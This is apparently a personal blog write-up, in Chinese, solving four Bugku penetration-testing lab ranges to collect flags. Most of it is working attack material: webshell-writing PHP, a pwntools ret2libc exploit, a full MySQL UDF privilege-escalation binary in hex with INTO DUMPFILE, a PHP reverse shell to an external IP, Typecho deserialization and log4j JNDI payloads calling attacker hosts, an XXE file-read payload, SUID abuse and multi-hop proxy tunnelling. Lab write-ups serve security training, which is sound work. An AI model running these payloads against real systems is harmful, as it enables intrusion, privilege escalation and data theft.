fffffilm's learning

bugku-渗透测试

  1. bugku-渗透测试
    1. 渗透测试一
      1. flag7
      2. flag8
      3. flag6
      4. flag1
      5. flag2
      6. flag3
      7. flag4
      8. flag5
      9. flag9
      10. flag10
      11. flag11
    2. 渗透测试二
      1. flag1
      2. flag2
      3. flag4
      4. flag3&flag5
      5. flag6
      6. flag7
      7. flag8&flag9
    3. 渗透测试三
      1. flag1
      2. flag2&flag3
      3. flag4
      4. flag8&flag7
      5. flag5&flag6
    4. 渗透测试四
      1. flag1
      2. flag2
      3. flag3
      4. flag4
      5. flag5

渗透

bugku-渗透测试

渗透测试一

直接上fscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
fscan -h 139.224.31.84

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
139.224.31.84:8080 open
139.224.31.84:80 open
139.224.31.84:22 open
139.224.31.84:9999 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://139.224.31.84      code:200 len:59433  title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://139.224.31.84:8080 code:302 len:0      title:None 跳转url: http://139.224.31.84:8080/login;jsessionid=EEE3B21FC2D0B1790EF75A93F0828B6F
[*] WebTitle http://139.224.31.84:8080/login;jsessionid=EEE3B21FC2D0B1790EF75A93F0828B6F code:200 len:2608   title:Login Page
[+] PocScan http://139.224.31.84:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]

flag7

发现有shiro漏洞,那先打shiro了。直接注入内存马,然后哥斯拉使用java加密器连接。

靶场/image-20241213135241255

靶场/image-20241213135324135

flag7 flag{799cf6022b49ac15aa88e3590997d657}

flag8

利用find进行suid提权

1
2
find / -user root -perm -4000 -print 2>/dev/null
find ./flag -exec cat /root/flag \; #需要当前目录存在flag文件

靶场/image-20241213140243225

flag8 flag{70403e2f406168d19e602adc1541e1e0}

flag6

在web服务的文件里面找到

靶场/image-20241213140530674

flag6 flag{eef5e1096042b0f026415e3b4d662235}

flag1

这个简单的shiro打完之后,再来看我们的80。

靶场/image-20241213140645612

在源代码里面找到

flag1 flag{a4358ce300cd7f2407541f9b55321b30}

flag2

前面说了要网站管理员,那肯定要登录了。这里不直接用前面shiro的shell找,是因为shiro其实是在另一个机器上,然后端口映射过来的,所以是另一个shell。

利用index.php/admin跳转到后台登录

admin/admin弱密码

靶场/image-20241213142543795

找到

flag2 flag{49ba8b1119527af742f87f5ccbbf847f}

flag3

上面有提到home,猜测flag在home目录。

先用网站给的在线运行环境测验,发现可以执行命令

靶场/image-20241213141130209

1
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);phpinfo();?>')?>

成功写入木马。

靶场/image-20241213142710668

flag3 flag{35a148014cce9eddeba72da4b7a9cd2a}

flag4

app/database.php

数据库

靶场/image-20241213141959729

如果连接不上,可以尝试将localhost换成127.0.0.1

靶场/image-20241213142124692

flag4 flag{40eac9fa0469d8cecbcaaa1b0b753361}

flag5

要提权到root。

应该就是个最简单的pwn,端口是一开始扫出来的9999

靶场/image-20241213142901417

不会pwn,找了个网上的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *

from LibcSearcher import *

context.log_level = 'debug'

r = remote('139.224.31.84', 9999)

elf = ELF('./main')

main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']

print(write_got)

ppp_ret = 0x08048559

payload = b'A' * (0x24 + 4) + p32(write_plt) + p32(ppp_ret) + p32(1) + p32(write_got) + p32(8) + p32(main_addr)

r.sendlineafter('plz input your name:\n', payload)

write_addr = u32(r.recv(4))

print(hex(write_addr))

libc = LibcSearcher('write', write_addr)

libc_base = write_addr - libc.dump('write')

system_addr = libc_base + libc.dump('system')

binsh_addr = libc_base + libc.dump('str_bin_sh')

print(hex(system_addr), hex(binsh_addr))

payload = b'A' * 40 + p32(system_addr) + b'a' * 4 + p32(binsh_addr)

r.sendlineafter('plz input your name:\n', payload)

r.interactive()

需要网络状态好才能,不然找不到libc

靶场/image-20241213155617180

flag5 flag{6a1e22502ab4d76ff794349a68a7dc5c}

或者使用udf提权

show global variables like '%secure%';检测secure_file_priv是否为空

靶场/image-20241213160043968

再检测插件位置show variables like 'plugin%';得到/usr/lib/x86_64-linux-gnu/mariadb18/plugin/

靶场/image-20241213160152120

select @@version_compile_os, @@version_compile_machine;看数据库架构

靶场/image-20241213160339271

是个64位系统,在这里面查到对应的信息MySQL UDF 提权十六进制查询 | 国光

1
SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/udf.so';

靶场/image-20241213160818783

然后引用我们的文件镜像CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

靶场/image-20241213160909464

验证select sys_eval('whoami'),成功提权(这里;好像不是必要的

靶场/image-20241213160931831

flag9

要开始内网了,上传fscan和venom

靶场/image-20241213143606511

1
./fscan -h 192.168.0.2/24

cat r*

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
192.168.0.4:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
192.168.0.3:8080 open
192.168.0.1:8080 open
192.168.0.4:3306 open
192.168.0.2:9999 open
192.168.0.1:9999 open
[*] WebTitle http://192.168.0.1:8080   code:302 len:0      title:None 跳转url: http://192.168.0.1:8080/login;jsessionid=78FEB49A0E6891DCC0E2D1473F60D56D
[*] WebTitle http://192.168.0.3:8080   code:302 len:0      title:None 跳转url: http://192.168.0.3:8080/login;jsessionid=2808B07F9D75465D20B48208B14C0AF8
[*] WebTitle http://192.168.0.1:8080/login;jsessionid=78FEB49A0E6891DCC0E2D1473F60D56D code:200 len:2608   title:Login Page
[*] WebTitle http://192.168.0.3:8080/login;jsessionid=2808B07F9D75465D20B48208B14C0AF8 code:200 len:2608   title:Login Page
[*] WebTitle http://192.168.0.2        code:200 len:59431  title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://192.168.0.1        code:200 len:59431  title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://192.168.0.4        code:200 len:8351   title:博客首页
[+] PocScan http://192.168.0.1:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] PocScan http://192.168.0.4 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://192.168.0.3:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]

分析一下目标

192.168.0.1|192.168.0.2 外网

192.168.0.3 shiro

192.168.0.4 tp

那就是要打tp了。利用php文件反弹shell

1
2
3
4
5
6
7
8
9
10
11
<?php
$ip='8.130.44.169';
$port='2333';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

然后php a.php。成功

靶场/image-20241213144049362

攻击机:./admin_linux_x64 -lport 9999

靶机:./agent_linux_x64 -rhost 156.238.233.55 -rport 9999

如图

靶场/image-20241213144253219

成功访问

靶场/image-20241213144419293

刚刚fscan已经扫出来tp的洞了。用Nday打就行。但是一直说黑名单。用工具成功getshell

靶场/image-20241213151332070

靶场/image-20241213151316274

flag9 flag{9fe15913cfa6bc74bfead5e23eea3f7b}

flag10

说了flag在数据库里面

靶场/image-20241213151455242

直接连就好了

靶场/image-20241213152908763

flag10 flag{f83d26a275cb68a39b1d9d1b841d9144}

flag11

利用PwnKit提权,这里由pkexec的suid想到尝试pwnkit

靶场/image-20241213153222282

flag11 flag{110ee31030ae9e0ebc0b443fa74fdf8e}

渗透测试二

flag1

先fscan开扫,没发现什么。忘截图了。

用wappalyzer发现使用但是Typecho的博客框架

靶场/image-20241213091958257

有个Nday[漏洞复现]typecho_v1.0.14反序列化漏洞_typecho 1.0.14-CSDN博客

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php

    class Typecho_Feed{
        private $_type;
        private $_items = array();

        public function __construct(){
            $this->_type = "RSS 2.0";
            $this->_items = array(
                array(
                    "title" => "test",
                    "link" => "test",
                    "data" => "20190430",
                    "author" => new Typecho_Request(),
                ),
            );
        }
    }

    class Typecho_Request{
        private $_params = array();
        private $_filter = array();

        public function __construct(){
            $this->_params = array(
                "screenName" => "eval('phpinfo();exit;')",
            );
            $this->_filter = array("assert");
        }
    }

    $a = new Typecho_Feed();

    $c = array(
        "adapter" => $a,
        "prefix" => "test",
    );

    echo base64_encode(serialize($c));
    //摘自https://www.cnblogs.com/litlife/p/10798061.html

记得加上Referer,然后**__typecho_config**的值是我们的payload

靶场/image-20241213092538562

然后写马一直失败,这里拿了一个别人的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<?php
class Typecho_Feed 
{ 
    const RSS1 = 'RSS 1.0'; 
    const RSS2 = 'RSS 2.0'; 
    const ATOM1 = 'ATOM 1.0'; 
    const DATE_RFC822 = 'r'; 
    const DATE_W3CDTF = 'c'; 
    const EOL = "\n"; 
    private $_type; 
    private $_items; 
    
    public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
        'title' => '1', 
        'link' => '1', 
        'date' => 1508895132, 
        'category' => array(new Typecho_Request()), 
        'author' => new Typecho_Request(), 
        ); 
    } 
} 
class Typecho_Request 
{ 
    private $_params = array(); 
    private $_filter = array(); 
    public function __construct(){ 
    $this->_params['screenName'] = 'echo "<?php phpinfo();@eval(\$_POST[1]);?>" > shell.php';    
    $this->_filter[0] = 'system'; 
    } 
} 
 
$exp = array( 
    'adapter' => new Typecho_Feed(), 
    'prefix' => 'typecho_' 
); 
 
echo base64_encode(serialize($exp));
?>

靶场/image-20241213093257280

flag1:flag{583679f6bc484f79e4dc2ca757f360de}

flag2

config.inc.php里面翻到数据库信息。

靶场/image-20241213094136531

找到flag2:flag{aabc736dbbcec82f5a5d967ee34cb6ad}

靶场/image-20241213094152242

flag4

由于不存在wget和curl,所以直接用蚁剑上传fscan和venom

靶场/image-20241213094805186

扫一下C段

1
./fscan -h 192.168.0.2/24

由于蚁剑是虚拟终端,所以是看不到回显的,需要我们自己cat result.txt

1
2
3
4
5
6
7
8
9
192.168.0.1:80 open
192.168.0.2:80 open
192.168.0.3:80 open
192.168.0.1:22 open
192.168.0.2:3306 open
[*] WebTitle http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[*] WebTitle http://192.168.0.1        code:200 len:3392   title:Harry's Blog
[+] mysql 192.168.0.2:3306:root 
[*] WebTitle http://192.168.0.3        code:200 len:4789   title:Bugku后台管理系统

配一下代理。

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 156.238.233.55 -rport 9999

发现192.168.0.3登录时响应头出现source.zip

靶场/image-20241213101041242

下载之后发现是一个log4j

靶场/image-20241213101403969

这里白框多出来的55不知道是怎么回事

靶场/image-20241213102057808

用springboot里面的payload

靶场/image-20241213102139359

${jndi:rmi://156.238.233.55:1099/fjudpl}

成功弹shell

靶场/image-20241213102206366

flag{34631421c7b4c1f0a2267b5391be5897}

flag3&flag5

读start.sh发现flag位置

靶场/image-20241213102404664

flag3 flag{ad02dc4b5909f67035aeed3073c80e40}
flag5 flag{a62eac23951be937fd7b18289aca7d82}

flag6

这台机器没有ifconfig命令,我们使用ip a拿到网络信息。

发现192.168.1.2

靶场/image-20241213102622914

然后通过wget下载fscan,venom

扫一下内网

1
./fscan -h 192.168.1.2/24 -nobr

发现有一个git仓库

1
2
3
4
5
6
7
8
9
10
11
12
13
(icmp) Target 192.168.1.2     is alive
(icmp) Target 192.168.1.1     is alive
(icmp) Target 192.168.1.3     is alive
[*] Icmp alive hosts len is: 3
192.168.1.3:80 open
192.168.1.1:80 open
192.168.1.2:80 open
192.168.1.1:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://192.168.1.2        code:200 len:4789   title:Bugku后台管理系统
[*] WebTitle http://192.168.1.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle http://192.168.1.3        code:200 len:524    title:乙公司Git仓库

在log4j机器上./agent_linux_x64 -lport 9899

靶场/image-20241213104925740

成功访问

靶场/image-20241213105121554

提交https://github.com/BWVS.git,得到

靶场/image-20241213105226317

flag{c516f7dca004dfbb003d27804e90bf23}

flag7

合理猜测,是会git clone我们提交的git地址,所以我们在仓库里面放一个马就可以getshell了。

这里直接用了别人制作好的仓库https://github.com/TheBeastofwar/webshell-repository.git

发现php后缀不解析,需要使用phtml后缀的木马

靶场/image-20241213105614497

根目录找到flag

靶场/image-20241213105729321

flag{129ead5fcaac8eeffef8dfccf47a86c5}

说一下怎么制作这种git仓库

flag8&flag9

靶场/image-20241213105813430

发现10.10.0.2,然后还是扫内网,搭代理。

汇总(这里正向反向是根据靶机环境决定的,可尝试不一样的方法

第一层:

主机:./admin_linux_x64 -lport 9999

靶机1:./agent_linux_x64 -rhost 156.238.233.55 -rport 9999

第二层:

log4j:./agent_linux_x64 -lport 9899

主机node1:connect 192.168.0.3 9899

第三层

git:./agent_linux_x64 -lport 9899

主机node2:connect 192.168.1.3 9899

./fscan -h 10.10.0.2/24

1
2
3
4
5
6
10.10.0.2:80 open
10.10.0.1:80 open
10.10.0.1:22 open
10.10.0.3:21 open
[*] WebTitle http://10.10.0.2          code:200 len:524    title:乙公司Git仓库
[*] WebTitle http://10.10.0.1          code:200 len:3368   title:Harry's Blog

发现了10.10.0.3:21,结合题目给的提示,猜测是要登录ftp。

靶场/image-20241213112029314

搭好代理

靶场/image-20241213112207123

此时(按理来说只需要最后一个就行了,但是一直连不上,估计是太多层代理导致网络状态不是很好,所以多加了几个链子,连接就更加稳定了。

1
2
3
socks5 156.238.233.55 9998
socks5 156.238.233.55 9997
socks5 156.238.233.55 9996

这里记得rm flag,要不然连续拿两次flag会被覆盖掉。

靶场/image-20241213113107822

靶场/image-20241213113128582

靶场/image-20241213113049460

flag8 flag{a16f408623b7697092666dfea2b63104}

flag9 flag{49aff4e872c264c58ca159408cdabfa2}

渗透测试三

flag1

先fscan扫一下,没发现什么有用的结果。

1
2
3
4
5
106.15.187.78:22 open
106.15.187.78:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://106.15.187.78      code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取

访问web服务,是一个爬虫

靶场/image-20241220192319827

感觉存在协议的利用,尝试过后的确有

靶场/image-20241220192401483

flag1 flag{f6cb56fe46911099f9fcc13f49b3c7e4}

flag2&flag3

靶场/image-20241220192536705

根据提示,扫一下目录,看看有没有留下来的马。

什么都没扫到。

利用一开始找到的ssrf来做内网探测,地址选择192.168.0.x或192.168.1.x。这是根据前两个靶场的经验。

发现1,2,10,138,250有结果。1,2就是这个服务,而10是被黑的网站,138是一个sql查询,250是一个登录

靶场/image-20241220195118166

靶场/image-20241220195330494

web目录

flag2 flag{2b247b5edeb35536c5694d92e189fcc5}

根目录

flag3 flag{b2a6e32a57e77efc70f80f7699c6f64d}

flag4

利用这个下载venom,配好socks代理

SQL注入(192.168.0.138

没有waf,并且sql语句都给了,随便注一下就好了。

靶场/image-20241220201636845

flag8&flag7

xxe(192.168.0.250

尝试用admin/admin登录,提示登录成功,但是什么变化都没有

抓包发现,是这样的形式,很可能有xxe

靶场/image-20241220202139263

的确,读到了最后的flag

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
<!ENTITY fffffilm SYSTEM "file:///flag">
]>
 
<user><username>&fffffilm;</username><password>456789</password></user>

靶场/image-20241220202318124

flag8 flag{f15da3eac1f89447b967283101387482}

web目录

flag7 flag{e7d1512619677a88dfb12f5ea0710893}

flag5&flag6

发现192.168.0.10里面还有一个网卡

靶场/image-20241220203246139

但是执行不了ping,所以fscan扫不了。

